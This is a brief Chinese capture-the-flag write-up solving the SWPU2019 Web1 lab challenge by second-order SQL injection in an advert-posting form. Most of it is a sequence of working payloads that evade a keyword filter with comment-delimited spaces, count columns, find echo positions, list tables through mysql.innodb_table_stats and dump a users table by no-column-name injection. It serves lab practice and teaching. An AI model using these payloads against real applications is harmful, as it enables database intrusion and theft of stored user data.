BUU-WEB-[SWPU2019]Web1

Posted 2021-05-20 TzZzEZ-web

[SWPU2019]Web1

这题的重点是留言板的二次注入。
随便注册一个账号进去，可以看到发布广告。

尝试发布一个1‘


报sql错误，因此判断在此处可以进行sql注入。
fuzzy爆破一下，发现大部分关键字被过滤。

爆破一下字段长度。

-1'/**/group/**/by/**/22,'1

爆破得到字段长度是22.
接着查看回显位。

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

回显位在2和3。
查询表名。

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

利用无列名注入，将第二列命名为别名b。

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

将第三列命名为别名b。

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22